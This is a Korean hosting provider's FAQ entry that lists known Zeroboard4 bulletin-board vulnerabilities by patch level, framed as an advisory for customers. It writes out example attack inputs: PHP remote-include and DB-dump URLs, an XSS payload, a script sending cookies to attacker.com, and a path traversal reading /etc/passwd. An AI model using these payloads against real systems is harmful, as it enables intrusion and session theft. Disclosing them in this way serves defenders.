도메인/호스팅정보
|
디자인/솔루션 정보
|
주문내역
|
요금관리
|
예치금/포인트
|
회원정보 수정
웹호스팅
|
서버호스팅
|
메일호스팅
|
그룹웨어호스팅
|
전자세금계산서
|
포워딩/파킹
|
아사프로
|
사용안내
|
이벤트
내도메인
|
신규등록
|
기간연장
|
기관이전
|
정보변경
|
도메인정보
|
장바구니
정액숍
|
디자인 시안
|
플래시
|
일러스트
|
페인터
|
편집사진
|
단독사진
|
문서
|
사운드
|
CD-Shop
|
이벤트숍
|
브랜드숍
|
주문제작
|
사용안내
쇼핑몰
|
정보제공
|
홈페이지제작
|
커뮤니티
|
그룹웨어
|
부가서비스
|
이벤트숍
|
브랜드숍
|
사용안내
비즈니스/기업
|
교육/생활
|
쇼핑몰
|
유지보수
|
이벤트숍
|
브랜드숍
|
주문제작
|
사용안내
트렌드뷰
|
웹강좌
|
자료실
뉴21랭킹이란?
|
랭킹매뉴얼
|
랭킹등록
|
랭킹카운터달기
|
랭킹관리
|
전체랭킹
내글목록
|
도메인문의
|
호스팅문의
|
아사프로문의
|
디자인몰문의
|
솔루션몰문의
|
잦은질문
|
요금관련
|
웹진/이벤트
|
이용약관
내정보 관련
도메인등록
등록정보변경
네임서버
도메인평가/매매
도메인정보조회
한글인터넷주소
웹호스팅
리눅스호스팅
윈도우즈호스팅
서버호스팅
이메일
부가서비스
파킹/포워딩
아사프로
게시판
회원관리
설문조사
접속통계
아사몰
전체보기
게시판
회원관리
설문조사
접속통계
메뉴관리
팝업/배너
웹메일
디자인몰 잦은 질문
CP입점문의
솔루션구매
솔루션기능
사이트관리
솔루션연동
기타
홈페이지몰 잦은 질문
유지보수 잦은질문
서비스요금
카드결제
환불관련
예치금
HOME
>
고객지원
>
잦은 질문
>
호스팅 잦은 질문
분류
: 웹호스팅
제목
: 제로보드4의 취약점은 어떤게 있나요?
글쓴이
:
호스팅팀
날짜
: 2011.07.19. 20:38:56
조회
:34545
추천
:0
글쓴이IP
:
파일
: 첨부파일이 없습니다.
[제로보드] 제로보드4 버전별 취약점 정리
버전 정보는 제로보드4 어드민 또는 설치된 디렉토리의 license.txt 에서 확인이 가능합니다.
1.제로보드 4 게시판의 취약성을 이용한 파일 변조
bbs/icon 폴더에 group_qazwsxedc.jpg 파일과 visitLog.php 생성
계정내 확장자가 html, php 파일들에 frame src="악성코드 배포지 URL 삽입 (예: http://h.nexprice.com/css/x.htm)
주로 bbs/폴더내의 파일들에 소스가 삽입됩니다.
계정내 파일들에 iframe 삽입은 없을 수도 있습니다.
제로보드 DB에 zetyx_group_table 생성되고 이 테이블의 header 또는
header_url 에 위 2번과 동일한 악성코드 배포지 URL 생성.
2. login.php 파일의 PHP Injection 취약점 / pl2 이하
login.php?group_no=1을 실행하여 취약점을 확인한 뒤,
login.php?group_no=1&file=[경로]를 호출하여 공격함
ex) login.php?group_no=1&file=test/injection.txt
echo "해킹이 가능합니다.";
?>
3. MySQL DB 덤프 취약점 / pl3 이하
admin_setup.php?_zb_lib_included=true&exec=db_dump&member=1
4. include/write.php 파일의 원격 PHP Injection 취약점 / pl4 이하
05년 호스팅 업체 해킹의 대표적인 사례
echo " echo "해킹이 가능합니다."; ?>";
?>
ex) include/write.php?dir=http://[원격 스크립트 주소]
5. check_user_id.php 파일의 XSS 취약점 / pl4 이하
heck_user_id.php?user_id=<script>alert(document.cookie);</script>
원격지 주소로 쿠키 값을 전송하기
<script> windows.location.href = 'http://attacker.com/write.php?val=' + document:cookie; </script>
6. skin/nzeo_vote/error.php 파일의 원격 PHP Injection 취약점 / pl5 이하
3번과 유사
7. 웹서버의 시스템 파일 노출 취약점 / pl5 이하
_head.php?_zb_path=../../../../etc/passwd%00
8. 정규표현식을 우회한 PHP Injection 취약점 / pl5 이하
정규표현식에 Null 문자() 삽입 시 그 문자까지 만을 정규표현식으로 인식하는 PHP의 특성
9. 비밀게시물을 열람할 수 있는 취약점 / pl6 이하
_member_info_included=1 의 변수를 조작하여 비밀글 열람 가능
10. .htaccess 파일업로드 취약점 / pl7 이하
.htaccess 파일이 업로드가 가능함
11. download.php 의 SQL Injection 취약점 / pl7 이하
download 회수를 paros를 통해 HTTP 헤더를 조작하여 변경할 수 있음
12. 쪽지기능의 XSS 취약점 / pl7 이하
쪽지에 XSS를 넣을경우 상대방에게 XSS가 가능함
글쓴이
제목
내용
전체글
한달
일주일
전체글:64 방문수:3955713
64
관리자모드 암호 변경요청
윤국상
2012.05.14. 10:41:19
33693
63
제로보드4의 취약점은 어떤게 있나요?
호스팅팀
2011.07.19. 20:38:56
34545
62
홈페이지에 접속하면 바이러스가 있다고 합니다.
호스팅팀
2009.11.24. 16:05:24
15771
61
FTP 접속이 되지 않습니다.
호스팅팀
2009.11.24. 16:03:59
17416
60
아웃룩 사용 중인데 로그인 암호가 기억나지 않습니다.
호스팅팀
2009.11.24. 15:26:56
17031
59
보내는 메일 용량과 받는 메일 용량을 제한하고 싶을 때
이광수
2006.04.14. 16:48:21
25734
58
CentOS 설치 후 한글이 깨질 때
이광수
2006.04.14. 16:46:52
23857
57
Qmail을 이용한 SMTP 운용
이광수
2006.04.14. 16:42:15
29122
56
사이트별 allow_url_fopen 허용방법
이광수
2006.04.14. 16:29:43
24038
55
호스팅의 용량, 트래픽 등 상위 서비스로 이전하고 싶습니다.
호스팅
2006.04.12. 16:11:36
24716
54
멀티도메인은 어떻게 신청하나요?
호스팅
2006.04.12. 16:06:37
24432
53
트래픽 초과로 사이트가 차단되었습니다.
호스팅
2006.04.12. 15:47:56
25150
52
호스팅 신청 후 내도메인 목록에 표시되지 않습니다.
이돈선
2006.04.12. 15:32:05
24460
51
스팸 필터링은 어떻게 하나요?
관리자
2006.03.18. 05:36:14
24065
50
웹메일 계정 추가는 어떻게 하나요?
관리자
2006.03.17. 18:51:12
26947
49
[JSP] mysql 접속 관련
김승진
2006.02.13. 10:37:11
25982
48
호스팅 명의변경을 하고 싶습니다.
호스팅
2006.02.07. 16:35:24
55790
47
홈페이지에 접속이 되지 않습니다.
호스팅
2006.02.07. 16:09:03
37945
46
[MSSQL] “시간제한이 만료되었습니다.”라는 메시지가 나옵니다. 어떤 메시지인가요?
웹호스팅팀
2005.05.06. 10:53:38
25971
45
[MSSQL] 트랜젝션 로그가 꽉 찼을 때 로그 없애는 방법을 알려주세요.
웹호스팅팀
2005.05.06. 10:51:10
24944
44
[ASP] "이 페이지를 볼 수 있도록 승인되지 않았습니다."라는 에러가 나옵니다. 왜 그렇죠?
웹호스팅팀
2005.05.06. 10:41:12
25469
43
한개의 호스팅으로 두 개의 도메인을 운영할 수 있나요?
서버관리자
2001.07.27. 17:07:08
33388
42
타 업체에서 이전하려면 어떻게 해야 하나요?
서버관리자
2001.07.27. 16:07:16
70994
41
회원관리 프로그램을 이용하고 싶습니다.
서버관리자
2001.07.27. 16:07:12
26849
40
네임서버가 변경되기 전에 아이디와 패스워드를 미리 받아볼 수 있나요?
서버관리자
2001.07.27. 15:07:43
24070
39
웹메일은 어떻게 사용하나요?
서버관리자
2001.07.27. 14:07:49
31875
38
e-mail 개수를 추가하려면?
서버관리자
2001.07.27. 14:07:46
24163
37
FTP나 Telnet의 ID/PW를 분실한 경우
서버관리자
2001.07.27. 14:07:44
27112
36
서버호스팅 이용시 서버는 누가 관리하나요?
서버관리자
2001.07.27. 11:07:04
23930
35
서버가 해킹을 당한 것 같습니다.
서버관리자
2001.07.26. 19:07:42
23433
34
[사이트 관리] 프론트 페이지 서버 익스텐션을 사용할 수 있나요?
서버관리자
2001.07.26. 17:07:09
22700
33
[ASP] 파일 업로드(Upload)를 위해 지원되는 서버 컴포넌트는 어떤 것이 있습니까?
서버관리자
2001.07.26. 17:07:08
25337
32
[ASP] “사용권한이 없습니다” 라는 에러가 나오는데 왜 그러죠?
서버관리자
2001.07.26. 17:07:08
26686
31
[호스팅 일반] 직접 만든 컴포넌트의 이용이 가능한지요?
서버관리자
2001.07.26. 17:07:07
22238
30
[ASP] OLE DB 만 지원하는 이유는 무엇인가요?
서버관리자
2001.07.26. 16:07:51
23414
29
[ASP] ASP 소스에서 DB 연결은 어떻게 하나요?
서버관리자
2001.07.26. 16:07:49
23969
28
DTS(Import and Export Data)의 절차는 어떻게 해야 하나요?
서버관리자
2001.07.26. 16:07:15
21672
27
데이터베이스의 내용을 어떻게 백업하나요?
서버관리자
2001.07.26. 16:07:00
21615
26
Enterprise Manager를 접속하시려면?
서버관리자
2001.07.26. 15:07:54
21958
25
MSSQL 에는 어떻게 접속하죠?
서버관리자
2001.07.26. 15:07:52
23349
24
제 계정에 있는 파일삭제가 안되네요
서버관리자
2001.07.26. 15:07:44
24144
23
mysql 데이터를 백업하는 방법을 알려주세요.
서버관리자
2001.07.26. 15:07:05
25173
22
mysql 접속법을 알려주세요.
서버관리자
2001.07.26. 15:07:04
26427
21
홈페이지 작업시 유의할 점
서버관리자
2001.07.26. 14:07:59
24451
20
나모 웹에디터에서 출판은 어떻게 하나요?
서버관리자
2001.07.26. 14:07:58
23545
19
게시판, 방명록, 카운터
서버관리자
2001.07.26. 14:07:57
24654
18
갑자기 홈페이지 접속속도가 느려졌어요.
서버관리자
2001.07.26. 14:07:55
37919
17
홈페이지에 그림이 보이지 않아요.
서버관리자
2001.07.26. 14:07:52
23638
16
홈페이지에 접속해 보면 File Not Found 라고 나옵니다.
서버관리자
2001.07.26. 14:07:51
24128
15
FTP 접속이 안됩니다.
서버관리자
2001.07.26. 14:07:42
27212
1
[ 2 ]
디자인몰 :
505-054089-13-002
예금주 : (주)아사달